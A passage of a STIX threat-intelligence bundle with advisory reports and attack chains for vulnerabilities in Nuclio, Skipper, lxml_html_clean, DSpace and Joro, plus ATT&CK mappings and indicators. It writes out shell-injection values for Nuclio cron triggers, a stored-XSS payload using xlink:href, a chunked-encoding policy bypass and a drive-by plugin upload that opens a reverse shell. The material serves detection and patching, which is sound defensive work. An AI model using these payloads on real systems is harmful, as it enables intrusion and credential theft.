      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--549a4db5-bae7-52e1-82c9-f6bb1a72986a",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--6587be55-e832-5b06-9b3b-4af4604cd32b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Create or Modify System Process",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1543",
          "url": "https://attack.mitre.org/techniques/T1543"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--261e0446-3c1a-5ab9-8b11-284b842cabad",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--549a4db5-bae7-52e1-82c9-f6bb1a72986a",
      "target_ref": "attack-pattern--6587be55-e832-5b06-9b3b-4af4604cd32b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--633c0a79-a71b-5eb7-9eca-504796091337",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OS Credential Dumping",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1003",
          "url": "https://attack.mitre.org/techniques/T1003"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--91ab1330-c577-5e2d-ab42-6c85a9c1f477",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--549a4db5-bae7-52e1-82c9-f6bb1a72986a",
      "target_ref": "attack-pattern--633c0a79-a71b-5eb7-9eca-504796091337"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--549a4db5-bae7-52e1-82c9-f6bb1a72986a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Nuclio Controller Vulnerability Leads to Persistent Kubernetes RCE (GHSA-v5px-423j-pf7p)",
      "description": "## Overview\n\nA critical vulnerability (GHSA-v5px-423j-pf7p, CWE-78) has been identified in the Nuclio controller, affecting all versions up to and including 1.15.27. This flaw stems from inadequate sanitization of user-provided input, specifically `event.headers` keys and `event.body` content within cron trigger specifications for NuclioFunctions. When the controller generates a Kubernetes CronJob, it constructs a `curl` invocation string that incorporates these unsanitized values directly into a shell command executed by `/bin/sh -c`. Attackers can exploit this by injecting shell metacharacters - either by breaking the double-quote context in `headerKey` or by using command substitution in `event.body` - to execute arbitrary commands within the CronJob's container. These CronJobs typically run with root privileges and, notably, lack Kubernetes `ownerReferences`, allowing them to persist indefinitely even if the original NuclioFunction is deleted, posing a significant risk for persistent remote code execution within the cluster.\n\n## Attack Chain\n\n1. An attacker, with permissions to create or modify NuclioFunctions in the Kubernetes cluster, crafts a malicious NuclioFunction definition.\n2. The attacker includes a `cron` trigger with a specially crafted `event.headers` key (e.g., `X-Inject\"; ARBITRARY_COMMAND; echo \"`) or a malicious `event.body` (e.g., `$(ARBITRARY_COMMAND)`) within the function's specification.\n3. The Nuclio controller reconciles the malicious NuclioFunction, invoking `generateCronTriggerCronJobSpec` to construct the internal `curl` command string.\n4. During command construction, the unsanitized `headerKey` or `eventBody` is injected directly into the shell command argument passed to `/bin/sh -c`. For `headerKey`, double quotes are improperly handled, allowing direct shell command injection; for `eventBody`, `strconv.Quote` fails to escape `$(...)`, enabling command substitution.\n5. The controller creates a Kubernetes CronJob resource with its container `args` explicitly configured as `/bin/sh -c \u003cmalicious_curlCommand\u003e`, where `malicious_curlCommand` now contains the injected arbitrary commands.\n6. The Kubernetes scheduler activates the CronJob, causing the CronJob pod to execute the `sh -c` command, leading to the execution of arbitrary commands (e.g., `id`, `cat /var/run/secrets/...`) within the pod. These pods often run with root privileges.\n7. The created CronJob lacks Kubernetes `ownerReferences`, allowing it to persist and continue executing its schedule indefinitely, even if the original NuclioFunction or its Deployment is subsequently removed.\n8. The attacker leverages this RCE to exfiltrate sensitive data (such as Kubernetes service account tokens), establish a persistent foothold, or further compromise the Kubernetes cluster.\n\n## Impact\n\nSuccessful exploitation of this vulnerability grants remote attackers persistent remote code execution within the target Kubernetes cluster, typically with root privileges. This allows for arbitrary command execution, sensitive data exfiltration (e.g., Kubernetes service account tokens), and potential for broader compromise of cluster resources. The lack of `ownerReferences` on the created CronJobs means that even if a compromised NuclioFunction is deleted, the malicious CronJob can continue to run indefinitely, ensuring persistence for the attacker. The vulnerability carries a CVSS 3.1 score of 9.9 (Critical), indicating severe consequences for confidentiality, integrity, and availability of the affected system.\n\n## Recommendation\n\n* **Patch CVE-XXXX-YYYY immediately**: Upgrade Nuclio to a patched version once available. Monitor official Nuclio channels for security updates addressing GHSA-v5px-423j-pf7p.\n* **Deploy the Sigma rules in this brief**: Implement the `Detect Nuclio CronJob RCE via Header Key Injection` and `Detect Nuclio CronJob RCE via Body Command Substitution` rules to identify attempts at exploiting this vulnerability at the Kubernetes API server audit log level.\n* **Review Kubernetes audit logs**: Actively monitor for suspicious `create`, `update`, or `patch` events on `batch/v1/cronjobs` resources, especially those originating from the Nuclio controller, for `args` fields containing the patterns identified in the IOCs.\n* **Restrict NuclioFunction deployment permissions**: Limit permissions to create or modify `NuclioFunction` resources to trusted administrators, reducing the attack surface for this vulnerability.\n",
      "published": "2026-07-08T20:26:14Z",
      "labels": [
        "remote-code-execution",
        "kubernetes",
        "cloud-native",
        "command-injection",
        "persistence",
        "critical-vulnerability",
        "ghsa"
      ],
      "object_refs": [
        "indicator--b12f4a2b-d7c1-5123-bc57-2474668b06c3",
        "indicator--cebc0025-c2b2-5d97-8dcb-7f912f7b2a6a",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--6587be55-e832-5b06-9b3b-4af4604cd32b",
        "attack-pattern--633c0a79-a71b-5eb7-9eca-504796091337"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-v5px-423j-pf7p"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9e6bff34-c170-5a4d-9cbc-649b61ae4a5d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--20a3032f-4d94-5b46-a03c-094cf98bc186",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--20a3032f-4d94-5b46-a03c-094cf98bc186",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Zalando Skipper OPA Policy Bypass via Chunked Encoding",
      "description": "## Overview\n\nA significant vulnerability (GHSA-659f-rgp5-w4wf) has been identified in `zalando/skipper` versions `\u003c= v0.26.8` that allows threat actors to bypass security policies enforced by the `opaAuthorizeRequestWithBody` filter. This bypass occurs when HTTP/1.1 requests use `Transfer-Encoding: chunked` or HTTP/2 requests omit the `content-length` pseudo-header. Under these conditions, the `OpenPolicyAgentInstance.ExtractHttpBodyOptionally` helper in Skipper incorrectly produces an empty `raw_body` for OpenPolicyAgent (OPA) policies, even though the full, potentially malicious, body is forwarded to the upstream service. This means OPA policies designed to inspect and deny requests based on body content (e.g., for `admin=true` fields, content moderation, or schema validation) will evaluate against an empty document and typically default to allowing the request, effectively neutralizing a critical layer of defense. The vulnerability affects operators relying on Skipper to protect private upstream services using body-content checks.\n\n## Attack Chain\n\n1. **Attacker identifies Skipper instance**: An attacker identifies a `zalando/skipper` API Gateway instance protecting a backend service, configured with the `opaAuthorizeRequestWithBody` filter.\n2. **Attacker crafts malicious HTTP request**: The attacker prepares an HTTP POST request containing a payload intended to be blocked by an OPA policy (e.g., `{\"admin\":true}` to gain administrative privileges).\n3. **Applies bypass framing**: The attacker sends the request using HTTP/1.1 with `Transfer-Encoding: chunked` headers or as an HTTP/2 request without a `Content-Length` pseudo-header.\n4. **Skipper receives and parses request**: The `zalando/skipper` instance receives the request. Due to the specific framing, Go's `net/http` parser sets `req.ContentLength = -1`.\n5. **OPA body extraction fails**: The `ExtractHttpBodyOptionally` function, which is supposed to buffer the body for OPA, checks `req.ContentLength \u003c= maxBodyBytes`. While `-1` passes this check, the subsequent `fillBuffer` loop's condition `int64(m.bodyBuffer.Len()) \u003c expectedSize` (`0 \u003c -1`) is immediately false, preventing any body data from being read. An empty `raw_body` is then passed to the OPA SDK.\n6. **OPA policy grants unauthorized access**: The OPA policy, expecting to evaluate `input.parsed_body` against the actual request body, instead receives an empty document. If the policy is designed to deny based on specific content (e.g., `input.parsed_body.admin == true`), it will default to \"allow\" because the condition is not met in the empty input.\n7. **Skipper forwards full payload**: Despite the OPA policy effectively being bypassed, Skipper proceeds to forward the *original, full, and uninspected malicious payload* (e.g., `{\"admin\":true}`) to the backend upstream service.\n8. **Upstream processes unauthorized request**: The upstream service receives and processes the unauthorized request and payload, potentially leading to privilege escalation, data modification, or remote code execution, depending on the backend's vulnerabilities.\n\n## Impact\n\nThis vulnerability allows for a complete bypass of critical security controls implemented via OpenPolicyAgent for body content inspection. Organizations using `zalando/skipper` with `opaAuthorizeRequestWithBody` policies to enforce granular authorization, content moderation, or schema validation for incoming requests are at risk. A successful exploitation enables unauthenticated attackers to send arbitrary payloads that OPA policies were explicitly designed to block, potentially leading to unauthorized data access, privilege escalation, command injection, or other severe compromises of protected backend services. There is no observed victim count or specific sector targeting mentioned, but any organization deploying Skipper as an API gateway is affected.\n\n## Recommendation\n\n* Upgrade `zalando/skipper` to a version that contains the fix for GHSA-659f-rgp5-w4wf immediately upon availability.\n* Review all OPA policies utilizing `input.parsed_body` with the `opaAuthorizeRequestWithBody` filter to understand their susceptibility to this bypass.\n* Deploy the Sigma rule below to detect attempts to use `Transfer-Encoding: chunked` in conjunction with body content that would typically be denied by OPA policies.\n* Ensure webserver logs or API gateway logs capture HTTP headers, specifically `Transfer-Encoding`, for POST requests to sensitive endpoints.\n",
      "published": "2026-07-08T20:27:10Z",
      "labels": [
        "vulnerability",
        "api-gateway",
        "security-bypass",
        "opa",
        "network"
      ],
      "object_refs": [
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-659f-rgp5-w4wf"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3df323ca-357e-50ca-bf37-4453eaa330cf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--30afcf53-972b-5e97-a77a-31d6f32de5a7",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Obfuscated Files or Information",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1027",
          "url": "https://attack.mitre.org/techniques/T1027"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d5eb25e6-e570-5994-b0dd-d3f5ea6c36e3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--30afcf53-972b-5e97-a77a-31d6f32de5a7",
      "target_ref": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--30afcf53-972b-5e97-a77a-31d6f32de5a7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "`lxml_html_clean` `javascript:` URL Bypass via `xlink:href` (CVE-2026-49825)",
      "description": "## Overview\n\nA critical vulnerability (CVE-2026-49825) has been identified in the `lxml_html_clean.Cleaner` library (versions `\u003c= 0.4.4`) and the legacy `lxml.html.clean` module within `lxml` (versions `\u003c= 6.1.0`). This flaw allows `javascript:`, `vbscript:`, and `data:` URLs to bypass HTML sanitization when present in namespaced attributes, specifically `xlink:href`, and when the `Cleaner` is instantiated with `safe_attrs_only=False`. The root cause is `lxml`'s `defs.link_attrs` allow-list, which `iterlinks()` relies on, not including `xlink:href`, preventing the `_remove_javascript_link` function from being invoked for these attributes. This enables stored Cross-Site Scripting (XSS) attacks in web applications that use these libraries for sanitizing user-supplied HTML, potentially leading to client-side code execution in victim browsers. The bug affects applications that aim for lenient attribute handling but still expect URL scheme scrubbing.\n\n## Attack Chain\n\n1. An attacker crafts a malicious HTML payload containing a `javascript:` URL embedded within an `xlink:href` attribute, such as `\u003csvg\u003e\u003ca xlink:href=\"javascript:alert(document.domain)\"\u003eclick me\u003c/a\u003e\u003c/svg\u003e`.\n2. The attacker submits this malicious HTML to a web application (e.g., a forum post, comment section) that uses `lxml_html_clean.Cleaner` or `lxml.html.clean` to sanitize user input.\n3. The `Cleaner` instance is configured with `safe_attrs_only=False`, a documented option for allowing custom attributes while still expecting URL scheme scrubbing.\n4. Due to the vulnerability (CVE-2026-49825), the `Cleaner` fails to identify and strip the `javascript:` URL from the `xlink:href` attribute because it's not present in its internal `link_attrs` allow-list.\n5. The unsanitized malicious HTML payload is successfully stored in the application's database or file system.\n6. A legitimate user accesses the web application page containing the stored malicious content, and their browser renders the SVG or MathML anchor element.\n7. The user clicks on the rendered link.\n8. The browser executes the embedded `javascript:` URL in the context of the victim's domain, leading to client-side code execution (Stored XSS). This can result in session hijacking, data exfiltration, or further attacks.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-49825 leads to stored Cross-Site Scripting (XSS), allowing attackers to execute arbitrary JavaScript in the context of a victim's browser session. This can result in sensitive data theft (e.g., session cookies, credentials), defacement of web pages, redirection to malicious sites, or further client-side attacks. The severity is rated as 8.2 / High (CVSS 3.1: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N), emphasizing that the vulnerability is network-exploitable with low attack complexity, requires user interaction (clicking the link), but changes the security scope and can lead to high confidentiality impact. Exploitation is conditional on the `safe_attrs_only=False` configuration.\n\n## Recommendation\n\n* Immediately update `lxml_html_clean` to version `0.4.5` or higher to remediate CVE-2026-49825, which addresses the flaw in URL scheme stripping.\n* If still using `lxml.html.clean`, ensure your `lxml` library version incorporates the fix for CVE-2026-49825, or switch to the maintained `lxml_html_clean` library.\n* Review all instances of `lxml_html_clean.Cleaner` or `lxml.html.clean` instantiation within your applications, especially those configured with `safe_attrs_only=False`, to ensure they are adequately sanitizing all user-supplied HTML.\n* Implement Content Security Policies (CSPs) with strict `script-src` directives to mitigate the impact of any successful XSS attempts, even if this vulnerability is exploited.\n",
      "published": "2026-07-08T20:28:11Z",
      "labels": [
        "xss",
        "vulnerability",
        "python",
        "web-application",
        "html-sanitization"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-4jhm-jv67-739f"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c4b767b6-9eee-50da-b043-bb67fd05e311",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8a2c8ceb-97f0-5a2b-9cf5-051591f6f83b",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--8a2c8ceb-97f0-5a2b-9cf5-051591f6f83b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "DSpace RCE via Velocity Templates (CVE-2026-49832)",
      "description": "## Overview\n\nRemote Code Execution (RCE) is possible via Velocity Templates used by DSpace for COAR Notify/LDN messages. This vulnerability, tracked as CVE-2026-49832, impacts DSpace versions 8.0 through 8.3, 9.0 through 9.2, and the 10.0-rc1 development release. An attacker must first obtain DSpace administrator credentials to exploit this flaw. When chained with a prior path traversal vulnerability (GHSA-9qm4-rh6w-pq5x), this allows for direct Java execution using reflection within Velocity templates. The vulnerability was discovered and reported by Pablo Picurelli Ortiz and affects critical components of the DSpace repository system, enabling adversaries with administrative access to compromise the integrity and confidentiality of the entire platform by executing arbitrary code on the server. The fix is included in DSpace 8.4, 9.3, and 10.0.\n\n## Attack Chain\n\n1. Attacker obtains valid DSpace administrator credentials through various means (e.g., phishing, credential stuffing, brute-force).\n2. Attacker logs into the DSpace administrative interface using the compromised credentials.\n3. Leveraging the LDN (COAR Notify) feature, the attacker exploits the identified path traversal vulnerability (GHSA-9qm4-rh6w-pq5x) to upload or modify a Velocity template file on the server.\n4. The attacker injects malicious Java code (using reflection) into the compromised Velocity template, specifically crafted to achieve server-side execution.\n5. The DSpace application, when processing an LDN message or rendering a page that utilizes the manipulated template, invokes the Velocity template engine.\n6. The Velocity engine processes the compromised template, leading to the execution of the embedded malicious Java code on the DSpace server.\n7. The attacker achieves Remote Code Execution (RCE) on the underlying DSpace server, enabling arbitrary command execution, data exfiltration, or further system compromise.\n\n## Impact\n\nThis vulnerability poses a very high impact when exploited, allowing for Remote Code Execution on the DSpace server. Successful exploitation requires DSpace administrator credentials and can be chained with a prior LDN Path Traversal Attack (GHSA-9qm4-rh6w-pq5x). If exploited, attackers can execute arbitrary Java code using reflection from Velocity templates, leading to full compromise of the DSpace instance, including data manipulation, exfiltration, or complete system takeover. The vulnerability affects DSpace versions 8.0 through 8.3, 9.0 through 9.2, and 10.0-rc1. Disabling the LDN feature serves as an effective workaround if immediate patching is not possible.\n\n## Recommendation\n\n* Upgrade DSpace instances to version 8.4, 9.3, or 10.0 immediately to remediate CVE-2026-49832.\n* Disable the LDN feature by setting `ldn.enabled=false` in `dspace.cfg` or `local.cfg` if it is not critical for your DSpace repository's operation.\n* If immediate upgrade is not feasible, apply the manual patch files available for DSpace 8.x (Pull request #12549) or DSpace 9.x (Pull request #12548) as described in the advisory.\n",
      "published": "2026-07-08T20:32:37Z",
      "labels": [
        "rce",
        "web-application",
        "vulnerability",
        "dspace"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-9x82-rm84-c6x7"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/DSpace/DSpace/security/advisories/GHSA-9qm4-rh6w-pq5x"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-49832"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0ccf8ae1-ab0e-5420-a59c-8ec3321c10be",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "file_name: pwn.so",
      "pattern": "[x-ti-bot:file_name = 'pwn.so']",
      "pattern_type": "stix",
      "valid_from": "2026-07-08T20:36:09Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--420c0a85-3651-5060-b67d-7d1fdbb372aa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--090f9e63-3d9e-53cf-8666-40dde1bf5d13",
      "target_ref": "indicator--0ccf8ae1-ab0e-5420-a59c-8ec3321c10be"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e45ab8fc-efb0-5498-ad7e-0b8b432b8de2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Drive-by Compromise",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1189",
          "url": "https://attack.mitre.org/techniques/T1189"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e984fde3-c73e-58bf-9fb8-da27a50e3e05",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--090f9e63-3d9e-53cf-8666-40dde1bf5d13",
      "target_ref": "attack-pattern--e45ab8fc-efb0-5498-ad7e-0b8b432b8de2"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Client Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1203",
          "url": "https://attack.mitre.org/techniques/T1203"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--817df415-6746-5878-b8c5-39ba841a3e84",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--090f9e63-3d9e-53cf-8666-40dde1bf5d13",
      "target_ref": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Hijack Execution Flow",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1574",
          "url": "https://attack.mitre.org/techniques/T1574"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c7cb7d66-7e14-51a1-a694-ccaf533d792d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--090f9e63-3d9e-53cf-8666-40dde1bf5d13",
      "target_ref": "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1c975c98-2811-5f96-808a-86db951b932c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--090f9e63-3d9e-53cf-8666-40dde1bf5d13",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Ingress Tool Transfer",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1105",
          "url": "https://attack.mitre.org/techniques/T1105"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--161f0104-2ef3-5c19-a9f0-f8dc467eb70a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--090f9e63-3d9e-53cf-8666-40dde1bf5d13",
      "target_ref": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--090f9e63-3d9e-53cf-8666-40dde1bf5d13",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Joro: Unauthenticated Cross-Origin Plugin Upload Leads to RCE",
      "description": "## Overview\n\nA critical vulnerability (CVE-2026-53649) affects BishopFox Joro versions ≤ v1.1.0 when running in its default proxy mode. An attacker can achieve unauthenticated remote code execution (RCE) on an operator's workstation (Linux/macOS) by leveraging a combination of weaknesses. Joro exposes a local API on `127.0.0.1:9090` which lacks authentication and applies a wildcard CORS policy. This design flaw allows cross-origin JavaScript on any attacker-controlled webpage to POST `multipart/form-data` requests directly to privileged API endpoints, such as `/api/v1/plugins/upload` and `/api/v1/system/restart`, through the victim's browser. Since Joro plugins execute their `init()` functions upon loading, this mechanism allows for an unauthenticated RCE as the operator's user with a single page visit. The vulnerability was reported on 2026-05-27 and an advisory published on 2026-07-08.\n\n## Attack Chain\n\n1. The operator visits an attacker-controlled web page in their browser (e.g., Firefox).\n2. JavaScript embedded in the attacker's page fetches a malicious shared object (`pwn.so`) from the attacker's server.\n3. The JavaScript then POSTs the `pwn.so` file to the local Joro API endpoint `http://127.0.0.1:9090/api/v1/plugins/upload` as `multipart/form-data`. Joro accepts this request due to the lack of authentication and permissive CORS policy.\n4. Immediately following, the JavaScript POSTs a request to `http://127.0.0.1:9090/api/v1/system/restart`, instructing Joro to re-execute.\n5. Upon restart, Joro attempts to open the newly uploaded `pwn.so` plugin. During the `plugin.Open()` call, the plugin's `init()` function is executed before any symbol lookup.\n6. The malicious `init()` function initiates a connection back to the attacker's listener, granting the attacker an interactive `/bin/bash -i` shell as the operator's user.\n\n## Impact\n\nThis vulnerability leads to unauthenticated, remote, browser-mediated code execution as the operator's user on affected Linux and macOS systems. The exploit pivots through the victim's browser to the loopback-bound Joro API, effectively bypassing network isolation typically assumed for `127.0.0.1` services. A single malicious `.so` plugin can be crafted to work against all operators running the affected Joro release, enabling widespread compromise of Joro users. The impact is direct system compromise and full control over the operator's user context.\n\n## Recommendation\n\n* Upgrade BishopFox Joro to a version greater than v1.1.0 immediately to patch CVE-2026-53649. Specifically, ensure the fixes introduced in commits `5c0ca35` and `871936f` are applied.\n* Deploy the Sigma rules provided in this brief to your SIEM to detect attempts at exploiting this vulnerability.\n* Ensure that web server logs (or application-level logs for Joro's API) are configured to capture requests to `127.0.0.1:9090`, including `cs-method` and `cs-uri-stem` fields, to enable detection.\n",
      "published": "2026-07-08T20:36:09Z",
      "labels": [
        "rce",
        "web-exploitation",
        "vulnerability",
        "javascript",
        "cross-origin",
        "cors"
      ],
      "object_refs": [
        "indicator--0ccf8ae1-ab0e-5420-a59c-8ec3321c10be",
        "attack-pattern--e45ab8fc-efb0-5498-ad7e-0b8b432b8de2",
        "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
        "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-xqhv-chqm-fhcc"
        }
      ],
      "confidence": 95
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--26122eba-3a76-5d8e-b4d8-9fe944782d5c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: attacker.com",
      "pattern": "[domain-name:value = 'attacker.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-08T21:13:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6f68e8e0-53c3-5826-ad1e-980bb3c08905",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b25b405b-ce1e-5ce0-beb8-24c54c9c976e",
      "target_ref": "indicator--26122eba-3a76-5d8e-b4d8-9fe944782d5c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0ad03349-e40c-51e6-a3c7-219404a28eab",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
